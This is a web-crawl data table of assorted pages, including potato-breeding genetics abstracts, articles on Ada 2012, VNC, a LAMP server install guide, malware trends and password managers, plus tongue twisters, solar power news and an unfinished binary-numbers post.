text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
Ballvora A.,Max Planck Institute for Plant Breeding Research |
Ballvora A.,University of Bonn |
Flath K.,Julius Kuhn Institute |
Lubeck J.,SaKa Pflanzenzucht GmbH and Co. KG |
And 4 more authors.
Theoretical and Applied Genetics | Year: 2011
The obligate biotrophic, soil-borne fungus Synchytrium endobioticum causes wart disease of potato (Solanum tuberosum), which is a serious problem for crop production in countries with moderate climates. S. endobioticum induces hypertrophic cell divisions in plant host tissues leading to the formation of tumor-like structures. Potato wart is a quarantine disease and chemical control is not possible. From 38 S. endobioticum pathotypes occurring in Europe, pathotypes 1, 2, 6 and 18 are the most relevant. Genetic resistance to wart is available but only few current potato varieties are resistant to all four pathotypes. The phenotypic evaluation of wart resistance is laborious, time-consuming and sometimes ambiguous, which makes breeding for resistance difficult. Molecular markers diagnostic for genes for resistance to S. endobioticum pathotypes 1, 2, 6 and 18 would greatly facilitate the selection of new, resistant cultivars. Two tetraploid half-sib families (266 individuals) segregating for resistance to S. endobioticum pathotypes 1, 2, 6 and 18 were produced by crossing a resistant genotype with two different susceptible ones. The families were scored for five different wart resistance phenotypes. The distribution of mean resistance scores was quantitative in both families. Resistance to pathotypes 2, 6 and 18 was correlated and independent from resistance to pathotype 1. DNA pools were constructed from the most resistant and most susceptible individuals and screened with genome wide simple sequence repeat (SSR), inverted simple sequence region (ISSR) and randomly amplified polymorphic DNA (RAPD) markers. Bulked segregant analysis identified three SSR markers that were linked to wart resistance loci (Sen). Sen1-XI on chromosome XI conferred partial resistance to pathotype 1, Sen18-IX on chromosome IX to pathotype 18 and Sen2/6/18-I on chromosome I to pathotypes 2,6 and 18. Additional genotyping with 191 single nucleotide polymorphism (SNP) markers confirmed the localization of the Sen loci. Thirty-three SNP markers linked to the Sen loci permitted the dissection of Sen alleles that increased or decreased resistance to wart. The alleles were inherited from both the resistant and susceptible parents. © 2011 The Author(s). Source
Targeted and untargeted approaches unravel novel candidate genes and diagnostic SNPs for quantitative resistance of the potato (Solanum tuberosum L.) to Phytophthora infestans causing the late blight disease
Mosquera T.,Max Planck Institute for Plant Breeding Research |
Mosquera T.,National University of Colombia |
Alvarez M.F.,Max Planck Institute for Plant Breeding Research |
Alvarez M.F.,National University of Colombia |
And 14 more authors.
PLoS ONE | Year: 2016
The oomycete Phytophthora infestans causes late blight of potato, which can completely destroy the crop. Therefore, for the past 160 years, late blight has been the most important potato disease worldwide. The identification of cultivars with high and durable field resistance to P. infestans is an objective of most potato breeding programs. This type of resistance is polygenic and therefore quantitative. Its evaluation requires multi-year and location trials. Furthermore, quantitative resistance to late blight correlates with late plant maturity, a negative agricultural trait. Knowledge of the molecular genetic basis of quantitative resistance to late blight not compromised by late maturity is very limited. It is however essential for developing diagnostic DNA markers that facilitate the efficient combination of superior resistance alleles in improved cultivars. We used association genetics in a population of 184 tetraploid potato cultivars in order to identify single nucleotide polymorphisms (SNPs) that are associated with maturity corrected resistance (MCR) to late blight. The population was genotyped for almost 9000 SNPs from three different sources. The first source was candidate genes specifically selected for their function in the jasmonate pathway. The second source was novel candidate genes selected based on comparative transcript profiling (RNA-Seq) of groups of genotypes with contrasting levels of quantitative resistance to P. infestans. The third source was the first generation 8.3k SolCAP SNP genotyping array available in potato for genome wide association studies (GWAS). Twenty seven SNPs from all three sources showed robust association with MCR. Some of those were located in genes that are strong candidates for directly controlling quantitative resistance, based on functional annotation. Most important were: a lipoxygenase (jasmonate pathway), a 3-hydroxy-3-methylglutaryl coenzyme A reductase (mevalonate pathway), a P450 protein (terpene biosynthesis), a transcription factor and a homolog of a major gene for resistance to P. infestans from the wild potato species Solanum venturii. The candidate gene approach and GWAS complemented each other as they identified different genes. The results of this study provide new insight in the molecular genetic basis of quantitative resistance in potato and a toolbox of diagnostic SNP markers for breeding applications. © 2016 Mosquera et al. This is an open access article distributed under the terms of the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original author and source are credited. Source
Urbany C.,Max Planck Institute for Plant Breeding Research |
Stich B.,Max Planck Institute for Plant Breeding Research |
Schmidt L.,Max Planck Institute for Plant Breeding Research |
Simon L.,Bavaria Saat BGB GmbH |
And 9 more authors.
BMC Genomics | Year: 2011
Background: Most agronomic plant traits result from complex molecular networks involving multiple genes and from environmental factors. One such trait is the enzymatic discoloration of fruit and tuber tissues initiated by mechanical impact (bruising). Tuber susceptibility to bruising is a complex trait of the cultivated potato (Solanum tuberosum) that is crucial for crop quality. As phenotypic evaluation of bruising is cumbersome, the application of diagnostic molecular markers would empower the selection of low bruising potato varieties. The genetic factors and molecular networks underlying enzymatic tissue discoloration are sparsely known. Hitherto there is no association study dealing with tuber bruising and diagnostic markers for enzymatic discoloration are rare.Results: The natural genetic diversity for bruising susceptibility was evaluated in elite middle European potato germplasm in order to elucidate its molecular basis. Association genetics using a candidate gene approach identified allelic variants in genes that function in tuber bruising and enzymatic browning. Two hundred and five tetraploid potato varieties and breeding clones related by descent were evaluated for two years in six environments for tuber bruising susceptibility, specific gravity, yield, shape and plant maturity. Correlations were found between different traits. In total 362 polymorphic DNA fragments, derived from 33 candidate genes and 29 SSR loci, were scored in the population and tested for association with the traits using a mixed model approach, which takes into account population structure and kinship. Twenty one highly significant (p < 0.001) and robust marker-trait associations were identified.Conclusions: The observed trait correlations and associated marker fragments provide new insight in the molecular basis of bruising susceptibility and its natural variation. The markers diagnostic for increased or decreased bruising susceptibility will facilitate the combination of superior alleles in breeding programs. In addition, this study presents novel candidates that might control enzymatic tissue discoloration and tuber bruising. Their validation and characterization will increase the knowledge about the underlying biological processes. © 2011 Urbany et al; licensee BioMed Central Ltd. Source
Li L.,Max Planck Institute for Plant Breeding Research |
Li L.,Northeast Forestry University |
Tacke E.,Bioplant GmbH |
Hofferbert H.-R.,Bohm Nordkartoffel Agrarproduktion OHG |
And 5 more authors.
Theoretical and Applied Genetics | Year: 2013
Tuber yield, starch content, starch yield and chip color are complex traits that are important for industrial uses and food processing of potato. Chip color depends on the quantity of reducing sugars glucose and fructose in the tubers, which are generated by starch degradation. Reducing sugars accumulate when tubers are stored at low temperatures. Early and efficient selection of cultivars with superior yield, starch yield and chip color is hampered by the fact that reliable phenotypic selection requires multiple year and location trials. Application of DNA-based markers early in the breeding cycle, which are diagnostic for superior alleles of genes that control natural variation of tuber quality, will reduce the number of clones to be evaluated in field trials. Association mapping using genes functional in carbohydrate metabolism as markers has discovered alleles of invertases and starch phosphorylases that are associated with tuber quality traits. Here, we report on new DNA variants at loci encoding ADP-glucose pyrophosphorylase and the invertase Pain-1, which are associated with positive or negative effect with chip color, tuber starch content and starch yield. Marker-assisted selection (MAS) and marker validation were performed in tetraploid breeding populations, using various combinations of 11 allele-specific markers associated with tuber quality traits. To facilitate MAS, user-friendly PCR assays were developed for specific candidate gene alleles. In a multi-parental population of advanced breeding clones, genotypes were selected for having different combinations of five positive and the corresponding negative marker alleles. Genotypes combining five positive marker alleles performed on average better than genotypes with four negative alleles and one positive allele. When tested individually, seven of eight markers showed an effect on at least one quality trait. The direction of effect was as expected. Combinations of two to three marker alleles were identified that significantly improved average chip quality after cold storage and tuber starch content. In F1 progeny of a single-cross combination, MAS with six markers did not give the expected result. Reasons and implications for MAS in potato are discussed. © 2013 The Author(s). Source
Obidiegwu J.E.,Max Planck Institute for Plant Breeding Research |
Obidiegwu J.E.,National Root Crops Research Institute Umudike |
Sanetomo R.,Max Planck Institute for Plant Breeding Research |
Sanetomo R.,Obihiro University of Agriculture and Veterinary Medicine |
And 6 more authors.
BMC Genetics | Year: 2015
Background: The soil borne, obligate biotrophic fungus Synchytrium endobioticum causes tumor-like tissue proliferation (wart) in potato tubers and thereby considerable crop damage. Chemical control is not effective and unfriendly to the environment. S. endobioticum is therefore a quarantined pathogen. The emergence of new pathotypes of the fungus aggravate this agricultural problem. The best control of wart disease is the cultivation of resistant varieties. Phenotypic screening for resistant cultivars is however time, labor and material intensive. Breeding for resistance would therefore greatly benefit from diagnostic DNA markers that can be applied early in the breeding cycle. The prerequisite for the development of diagnostic DNA markers is the genetic dissection of the factors that control resistance to S. endobioticum in various genetic backgrounds of potato. Results: Progeny of a cross between a wart resistant and a susceptible tetraploid breeding clone was evaluated for resistance to S. endobioticum pathotypes 1, 2, 6 and 18 most relevant in Europe. The same progeny was genotyped with 195 microsatellite and 8303 single nucleotide polymorphism (SNP) markers. Linkage analysis identified the multi-allelic locus Sen1/RSe-XIa on potato chromosome XI as major factor for resistance to all four S. endobioticum pathotypes. Six additional, independent modifier loci had smaller effects on wart resistance. Combinations of markers linked to Sen1/RSe-XIa resistance alleles with one to two additional markers were sufficient for obtaining high levels of resistance to S. endobioticum pathotypes 1, 2, 6 and 18 in the analyzed genetic background. Conclusions: Potato resistance to S. endobioticum is oligogenic with one major and several minor resistance loci. It is composed of multiple alleles for resistance and susceptibility that originate from multiple sources. The genetics of resistance to S. endobioticum varies therefore between different genetic backgrounds. The DNA markers described in this paper are the starting point for pedigree based selection of cultivars with high levels of resistance to S. endobioticum pathotypes 1, 2, 6 and 18. © 2015 Obidiegwu et al.; licensee BioMed Central. Source | <urn:uuid:93d0bdb5-0ecb-47f1-adae-5be656631d34> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/bioplant-gmbh-746899/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00492-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.89439 | 2,728 | 2.578125 | 3 |
ISO Approves Ada 2012 Programming Language Standard
Ada is a structured, statically typed, imperative, wide-spectrum and object-oriented high-level computer programming language, extended from Pascal and other languages. It has strong built-in language support for explicit concurrency, offering tasks, synchronous message passing, protected objects and nondeterminism. Ada was originally designed by a team led by Jean Ichbiah of CII Honeywell Bull under contract to the United States Department of Defense from 1977 to 1983 to supersede the hundreds of programming languages then used by the DOD. The programming language was named after Ada Lovelace, a mathematician who is sometimes regarded as the world's first programmer because of her work with Charles Babbage. She was also the daughter of the poet Lord Byron. Ironically, the Ada 2012 standard announcement comes just days after Lovelace's Dec. 10 birthday. Ada was originally targeted at embedded and real-time systems. The Ada 95 revision, designed by S. Tucker Taft of Intermetrics in the early 1990s, improved support for systems, numerical, financial and object-oriented programming (OOP). Ada is designed for the development of very large software systems. Ada packages can be compiled separately, and their specifications can also be compiled separately without the implementation to check for consistency. This makes it possible to detect problems early during the design phase, before implementation starts. The Ada programming language is designed for large, long-lived applications—and embedded systems in particular—where reliability and efficiency are essential.ISO and the International Electrotechnical Commission (IEC) are the two primary organizations for international standardization. They resolve the problem of overlapping scope by forming a Joint Technical Committee, JTC1, to deal with all standardization in the scope of information technology. JTC1 deals with its large scope of work by subdividing the responsibility among a number of subcommittees. SC22—which deals with programming languages, their environments and system software interfaces—is the parent body of WG9. In turn, SC22 subdivides its scope of work among several Working Groups. WG9 is responsible for the "development of ISO standards for programming language Ada." That gives you ISO/IEC JTC1/SC22/WG9. The formal approval of the standard was issued Nov. 20 by ISO/IEC JTC 1, and the standard was published Dec. 15. A technical summary of Ada 2012, together with an explanation of the language's benefits and a set of links to further information, is available at www.ada2012.org, which the Ada Resource Association maintains.
The language revision, known as Ada 2012, was under the auspices of ISO/IEC JTC1/SC22/WG9 and was conducted by the Ada Rapporteur Group (ARG) subunit of WG9, with sponsorship in part from the ARA and Ada-Europe. | <urn:uuid:b2398a26-c332-4b17-93a9-009f4a991952> | CC-MAIN-2017-04 | http://www.eweek.com/developer/iso-approves-ada-2012-programming-language-standard-3 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950432 | 599 | 2.859375 | 3 |
What is virtual network computing?
- By William Jackson
- Feb 25, 2014
Developed in the 1990s by researchers at the Olivetti & Oracle Research Laboratory at Cambridge, UK, virtual network computing was envisioned as an “ultra-thin client system” that would give users remote access not only to applications and data but also to a desktop environment.
“VNC thus provides mobile computing without requiring the user to carry any device whatsoever,” it creators wrote in a 1998 paper.
Thin clients have come and gone, and nearly everyone today is carrying a mobile device anyway, but because of the lightweight Remote Frame Buffer protocol on which it is built, VNC has found a large niche today as a remote access tool.
“It is the simplicity of this protocol that makes VNC so powerful,” the developers wrote. “Unlike other remote display protocols such as the X Windows System and Citrix’s ICA, the VNC protocol is totally independent of the operating system, windowing system and applications.”
AT&T acquired the Cambridge lab in 1999 and halted research in 2002, and four of the developers (Tristan Richardson, Andy Harter, James Weatherall and Andy Hopper) formed RealVNC to take the open source software in-house and develop it commercially. Open source versions remain available.
VNC consists of server software installed on a remote computer that will be shared, and client viewer software installed on another computer that will access the desktop. The viewer connects to a port on the server, and the RFB protocol enables access to and remote control of a graphical user interface. Although the protocol can help reduce overhead and latency, a broadband connection is required for it to work well.
William Jackson is a Maryland-based freelance writer. | <urn:uuid:13e0d90f-4f3a-40ec-b664-87671fb77fb4> | CC-MAIN-2017-04 | https://gcn.com/articles/2014/02/25/what-is-virtual-network-computing.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00216-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.931289 | 371 | 3.625 | 4 |
If you’re running an open source server in the gBlock cloud, you are probably already familiar with a LAMP stack. If you haven’t used one before, LAMP is a web application and deployment stack that is very common and simple to install and use on your virtual machines. This blog will walk you through a LAMP installation so you can get development cranking.
LAMP stands for Linux, Apache Web server, MySQL database, and Perl, Python, or PHP, all common tools for administrators and developers. As LAMP has become more and more common, software extensions have been created that facilitate these different tools working together.
As far as how they do work together, a user accessing your Apache web server will call up your applications and files, which are located on attached storage. The web server delivers code that is created in Perl/Python/PHP, which in turn references the MySQL database.
OK, ready to get started? First step is to grab the packages and configure your quotas.
1) Add packages with
# yum install wget bzip2 unzip zip nmap openssl fileutils ncftp gcc gcc-c++
Next, if you have not already, enable quotas on your server. In Red Hat, while logged in as root, use a text editor to edit the /etc/fstab file. Add the usrquota and/or grpqouta options to the file systems that require quotas.
Run quotacheck to create a table of quota-enabled file systems with current disk usage. For example,
# quotacheck –cug /home
will create quota files in the /home directory, with –c creating them for each file system, -u specifying user quotas, and –g specifying group quotas.
You can also type edquota and a user name to launch your default editor and edit the quotas for an individual user directly. This will set disk limits. Do this for each user that requires a quota. The system will display the used blocks, as well as soft, hard, and inodes. Hard block limits are the maximum amount of disk space allotted to that user, while soft limits allow the user to go above that limit for a period of time. Set this grace period by entering
# edquota –t
2) Install MySQL
# yum install mysql-devel mysql-server #chkconfig --level 2345 mysqld on #/etc/init.d/mysqld start
Check that networking is enabled. Run:
# netstat -tap | grep mysql
It should show a line like this:
[root@server1 named]# netstat -tap | grep mysql tcp 0 0 *:mysql *:* LISTEN 2470/mysqld
If it does not, edit /etc/my.cnf and comment out the option skip-networking:
# vi /etc/my.cnf #skip-networking #/etc/init.d/mysqld restart
Set a password using one of these methods:
Create additional database users:
mysql> CREATE USER 'name'@'localhost' IDENTIFIED BY 'some_pass'; mysql> GRANT ALL PRIVILEGES ON *.* TO 'monty'@'localhost' -> WITH GRANT OPTION;
Alternatively you can run:
3) Install Apache2 with PHP
To get started installing Apache2 with PHP, enter:
# yum install httpd mod_ssl php php-devel php-gd php-imap php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc curl curl-devel perl-libwww-perl ImageMagick libxml2 libxml2-devel
# vi /etc/httpd/conf/httpd.conf
Change directory index to include php pages:
[...] DirectoryIndex index.html index.htm index.shtml index.cgi index.php index.php3 index.pl [...]
# chkconfig httpd on #/etc/init.d/httpd start
Edit httpd.conf to hide the Apache version number:
# vi /etc/httpd/conf/httpd.conf ServerSignature off
Edit sysctl.conf to enable SYN cookies protection:
# Enable TCP SYN Cookie Protection net.ipv4.tcp_syncookies = 1
Restart the network server:
# service network restart
Configure Mod_Evasive. Mod_Evasive offers Apache protection against DDoS.
# cd /root # wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz # tar zxf mode_evasive-1.10.1.tar.gz # cd mod_evasive # /usr/sbin/apxs -cia mod_evasive20.c # vi /etc/httpd/conf/httpd.conf DOSHashTableSize 3097 DOSPageCount 2 DOSSiteCount 50 DOSPageInterval 1 DOSSiteInterval 1 DOSBlockingPeriod 10
Add vsftpd (If necessary). This enables secure FTP access to your web server.
#yum install vsftpd #vi /etc/vsftpd/vsftpd.conf
Disable anonymous logins:
# vi /etc/vsftpd/vsftpd.conf
in the 12th line edit
Save vsftpd.conf file and restart the daemon:
# service vsftpd restart
#chkconfig –levels 235 vsftpd on #service vsftpd start
With this default configuration, the users' FTP directory will be set to their home directory.
4) Set up PHPMyAdmin
You should now have all the tools you need for a fully loaded LAMP stack. Happy developing! | <urn:uuid:c71f7ba5-99e4-435f-bc1d-cd07c39cfde4> | CC-MAIN-2017-04 | https://www.greenhousedata.com/blog/how-to-install-a-lamp-stack-on-cent-os-or-red-hat-cloud-servers | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00428-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.694707 | 1,249 | 2.625 | 3 |
The report, from Blue Coat Systems, which tapped the data pool generated by its WebPulse security service, says that hackers are developing broader attack strategies, including complex blended threats, faster malware lifecycles and search engine manipulation.
According to to Blue Coat, malware is starting to be adapted by hackers in relatively rapid lifecycles – the average lifespan of a typical piece of malware dropped from seven hours in 2007 to just two in 2009, notes the report.
As a result of this faster malware lifecycle, the study says that defences that require patches and downloads are simply unable to keep pace.
Increased reliance on social networking for communication, says Blue Coat, means there is less reliance on web-based email, which dropped in popularity from fifth place in 2008 to ninth place in 2009.
And, the report adds, exploiting user trust drives most common threats. The two most common web-based threats in 2009 – the fake antivirus software and the fake video codec – both exploited user trust on the internet, search engines and social networks.
According to Blue Coat, these were not the 'drive-by' attacks of recent years, nor did they require a vulnerability to exploit other than human behaviour.
Chris Larsen, senior malware researcher at Blue Coat, said that the increasing use of link farms to manipulate search engine results and prey on the trust users have in their internet experience drove many of the malware exploits his researchers saw in 2009 and are continuing to see in 2010.
"To provide comprehensive protection in the face of these threats, enterprises need not only a layered defence but also better user education", he said.
"The web is growing too fast in all directions for human raters or even web crawlers to manage. It is turning into a war of machines, and the best defences are able to leverage the strength-in-numbers principle to protect users", he added
The information in the report is based on an analysis of data collected from the Blue Coat WebPulse service, a cloud-based collaborative defence facility that is billed as having 62 million users around the world. | <urn:uuid:2bc31fef-7159-42fc-a072-0c72672dec62> | CC-MAIN-2017-04 | https://www.infosecurity-magazine.com/news/social-networking-is-driving-hacker-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00088-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95516 | 426 | 2.53125 | 3 |
Tongue Twisters - Collection of Tongue Twisters
We are sharing some of the popular tongue twisters with you in this article. If you know of some other tongue twisters then feel free to share them in your comment for others to view and let us make this article world's largest collection of tongue twisters.
A tongue-twister is a phrase that is designed to be difficult to articulate properly. Tongue-twisters may rely on similar but distinct phonemes, unfamiliar constructs in loanwords, or other features of a language. Many tongue-twisters use a combination of alliteration and rhyme. They have two or three sequences of sounds, then the same sequences of sounds with some sounds exchanged. For example, She sells sea shells on the sea shore. The shells that she sells are sea shells I'm sure.
Collection of Tounge Twisters
- If you understand, say "understand". If you don't understand, say "don't understand". But if you understand and say "don't understand". How do I understand that you understand? Understand!
- I wish to wish the wish you wish to wish, but if you wish the wish the witch wishes, I won't wish the wish you wish to wish.
- Sounding by sound is a sound method of sounding sounds.
- A sailor went to sea to see, what he could see. And all he could see was sea, sea, sea.
- Purple Paper People, Purple Paper People, Purple Paper People.
- If two witches were watching two watches, which witch would watch which watch?
- I thought a thought but the thought I thought wasn't the thought I thought. I thought if the thought I thought had been the thought I thought, I wouldn't have thought so much.
- Once a fellow met a fellow in a field of beans, said a fellow to a fellow. If a fellow asks a fellow, Can a fellow tell a fellow what a fellow means?
- Mr. Inside went over to see Mr. Outside. Mr. Inside stood outside and called to Mr. Outside inside.
- Mr. Outside answered Mr. Inside from inside and Told Mr. Inside to come inside. Mr. Inside said "NO", and told Mr. Outside to come outside.
- Mr. Outside and Mr. Inside argued from inside and outside about going outside or coming inside. Finally, Mr. Outside coaxed Mr. Inside to come inside then both Mr. Outside and Mr. Inside went outside to the riverside.
- She sells sea shells on the sea shore. The shells that she sells are sea shells I'm sure.
- The owner of the inside inn was inside his inside inn with his inside outside his inside inn.
- If one doctor doctors another doctor does the doctor who doctors the doctor, doctors the doctor the way the doctor he is doctoring doctors? Or does the doctor doctors the way the doctor who doctors doctor?
- When a doctor falls ill another doctor doctors the doctor. Does the doctor doctoring the doctor doctors the doctor in his own way or does the doctor doctoring the doctor doctors the doctor in the doctor's way.
- We surely shall see the sun shine shortly. Whether the weather be fine, or whether the weather be not, Whether the weather be cold Or whether the weather be hot, We'll weather the weather Whatever the weather, Whether we like it or not.
- Whether the weather is hot or whether the weather is cold. Whether the weather is either or not, It is whether we like it or not.
- Nine nice night nurses nursing nicely.
- A flea and a fly in a flue Said the fly "Oh what should we do", said the flea. "Let us fly", said the fly to the flea. So they flew through a flaw in the flue.
- If you tell Tom to tell a tongue-twister his tongue will be twisted as tongue-twister twists tongues.
- Mr. See owned a saw and Mr. Soar owned a seesaw. Now See's saw sawed Soar's seesaw Before Soar saw See, Which made Soar sore. Had Soar seen See's saw Before See sawed Soar's seesaw; See's saw would not have sawed Soar's seesaw. So See's saw sawed Soar's seesaw. But it was sad to see Soar so sore just because See's saw sawed Soar's seesaw.
Please feel free to share more tounge twisters in your comments below.
This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you.
We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus | <urn:uuid:7091523e-04ff-4fda-8537-f88311a4eebb> | CC-MAIN-2017-04 | http://www.knowledgepublisher.com/article-464.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00574-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953417 | 1,037 | 3.046875 | 3 |
A year ago, we talked about reaching for Terabit Ethernet, the next power-of-10 increase in speed over the state of the art today. Now, researchers have demonstrated one way to do that.
In a paper published in the Feb. 16 edition of Optics Express, the researchers detail their approach for de-multiplexing signals at high speeds, claiming that they were able to achieve 640Gbps over fiber-optic lines with no errors.
The material they used in the chip is chalcogenide, and Australian researchers were talking about the high-speed networking possibilities of the material last summer. Calling it "just a piece of scratched glass," they said it could potentially be cheap to produce.
At these bit rates, the researchers say that it is only possible to perform switching with an all-optical system, using optical time-division multiplexing. And chalcogenide allows for "femtosecond response time" (now that's fast). The nature of the material means that it only needs to be 5 centimeters long for it to work, so it's nicely compact.
Recently, Sreedhar Kajeepeta, a CTO at CSC, wrote about how a Terabit Ethernet could be used. Presumably, it would not just be used for aggregating lower-speed links, but would inspire us to reach higher, to new applications, perhaps to something called Augmented Reality. That application is where real-life video and audio are combined with virtual video and audio.
History has taught us that we will find a way to fill up the pipe, but don't look for Terabit Ethernet to your desktop anytime soon. | <urn:uuid:5317e56d-9f78-49f8-9560-0a4f1a8a9bf7> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2266977/lan-wan/breakthrough-enables-terabit-ethernet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00474-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95845 | 345 | 3 | 3 |
Will passwords soon become a thing of the past? Have they already become obsolete? This is perhaps one of the most prominent topics under discussion in the technical media these days.
A couple of weeks ago, Forbes.com published a story about the probable public launch of U2F (Universal Second Factor) – a new form of authentication by Google in alliance with Yubico. Through U2F, Google wants “to help move the web towards easier and stronger authentication, where web users can own a single easy-to-use secure authentication device built on open standards, which works across the entire web.” Media reports following the story have fuelled wild speculations that traditional passwords will soon die.
U2F is creating quite a stir, just like buzz created by the session on “Passwords are dead” in the RSA conference in San Francisco earlier this year. Meanwhile, the Petition Against Passwords movement gained widespread, global media attention last summer. Launched by a group of companies selling password-less technology, the online petition is being used to “collect every frustrated yell at forgotten passwords and make sure the organizations responsible hear them.”
Of course, people have been speculating on the death of passwords for almost a decade. Microsoft Chairman Bill Gates predicted the death of passwords in 2004 and then again in 2006, when he said that the end to passwords was at sight. Gates isn’t alone. Many other luminaries and industry analysts have long been predicting the disappearance of passwords. Still, passwords continue to be the most prominent method of authentication.
The grievance against passwords
With the proliferation of online applications, a variety of passwords occupies each aspect of our life. Remembering dozens of passwords is impossible. Storing them only invites trouble. And managing them manually is a pain.
With high-profile security breaches involving stolen online identities, all of us want to be rid of passwords. These security breaches also invite discussions on password replacement and raise the million-dollar question: do we have viable alternatives if passwords finally die?
Alternatives abound, but none viable
Alternatives to passwords, such as biometric authentication, iris authentication, facial authentication, various forms of multi-factor authentications, and even authentication through items like watches, jewelry, and electronic tattoos, are all being discussed.
A couple of months ago, Apple launched the Touch ID fingerprint sensor, which was built into the iPhone 5S. Touch ID allows users to access their phones with a press of the finger, “without the need to remember complex sequences of letters or numbers”. The launch of Touch ID also made the media promptly talk about the disappearance of passwords.
Interestingly, some of these alternative authentication methods have been cracked even before they could be adopted widely. A few years ago, a group of researchers hacked faces in biometric facial authentication systems by using phony photos of legitimate users.
Active research is also on to formulate better alternatives.
However, none of the alternative approaches have been viable so far for various reasons. Passwords are very easy to create and are absolutely free. The alternatives, on the other hand, are typically expensive, difficult to integrate with existing environments, difficult to use, and require additional hardware components.
Passwords are here to stay; protect them
For now, a viable replacement for traditional passwords is not in sight. When the next-generation of password-replacing security technologies does emerge, it’s going to take a while for them to be widely accepted and adopted. All of which mean that passwords are going to be here around for a while.
Passwords are commonly perceived to be not secure and a burden. While worrying over the pain points, we overlook the actual problem. The actual problem is poor password management, not the passwords themselves.
Unable to remember strong passwords, users tend to use and reuse simple passwords everywhere. They store passwords in text files and post-it notes, share credentials among team members, and reveal secure login details in emails and by word of mouth. Real access controls do not exist and passwords to sensitive resources and applications remain unchanged for ages. Such bad password management practices invite security issues and other problems.
Use a password manager
While the research is on to find an alternative to passwords, it would be prudent to deploy a password manager to safeguard your data. With a password manager, you can secure all your passwords in a centralized repository; use strong, unique passwords without worrying about remembering them; automate and enforce password management best practices; control access to resources and applications; keep track of activities; and do much more.
If you are wondering which password manager to use, take a look at ManageEngine Password Manager Pro. | <urn:uuid:bbbf7b7b-1910-4f85-9838-5d14f3dd29fd> | CC-MAIN-2017-04 | https://blogs.manageengine.com/it-security/passwordmanagerpro/2013/12/12/will-passwords-become-obsolete-soon.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00474-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933987 | 956 | 2.640625 | 3 |
World’s Largest Solar Thermal Plant Joins California's Grid
/ February 18, 2014
On Feb. 13, 2014, the Ivanpah Solar Electric Generating System was declared operational and began delivering solar electricity to California customers.
At full capacity, the facility’s trio of 450-foot high towers produces a gross total of 392 megawatts (MW) of solar power, which is enough electricity to provide 140,000 California homes with clean energy and avoid 400,000 metric tons of carbon dioxide per year, equal to removing 72,000 vehicles off the road.
Ivanpah, which is a joint effort between NRG Energy, Google and BrightSource Energy, accounts for nearly 30 percent of all solar thermal energy currently operational in the U.S., and is the largest solar project of its kind in the world.
Like this story? If so, subscribe to Government Technology's daily newsletter.
The project is the first to use BrightSource’s solar power tower technology to produce electricity, which includes 173,500 heliostats that follow the sun’s trajectory, solar field integration software and a solar receiver steam generator.
The solar energy harnessed from Ivanpah’s Units 1 and 3 are being sold to Pacific Gas & Electric under two long-term power purchase agreements, while the electricity from Unit 2 is being sold to Southern California Edison under a similar contract. | <urn:uuid:974d8e6c-9362-4fd4-b017-b74c9ac1b5d9> | CC-MAIN-2017-04 | http://www.govtech.com/photos/Photo-of-the-Week-Worlds-Largest-Solar-Thermal-Plant-Joins-Californias-Grid.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00042-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90365 | 291 | 2.71875 | 3 |
I figured what better day than January 11th, 2011 (1/11/11) than to write this long overdue post on binary numbers.
Binary numbers are one of the fundamental things to computer science that need to be understood before moving onto the more complicated things. It’s a system of math and once it clicks, it will open up a lot of other things like understanding logic gates on up to and beyond the technical aspects of networking.
Your normal system of math is base 10 meaning you have ten different options for what a number might be: 0, 1, 2, 3, 4, 5, 6, 7, 8, or 9. The binary system is base 2 meaning you have two different options for a number: 0 or 1. It’s a lot like other boolean objects like true or false. What do you call a carbonated beverage: Pop or Soda? Which do you prefer Pepsi or Coke? (The correct answers are Pop and Pepsi, respectively.)
In the name of fun, Coca-Cola and Pepsi help us out by having their own flavors that fit nicely into this explanation: Coke Zero and Pepsi One. So, let’s learn (or review) the basics of Binary Systems using these flavors as pop; Coke Zero as zero and Pepsi One as one.
Each can is a bit.
8 cans would be 8 bits.
8 bits also equal 1 byte.
Each can may either have the value of a…
or a zero.
Let’s count from 0 to 7 in binary. Then I’ll explain how it works.
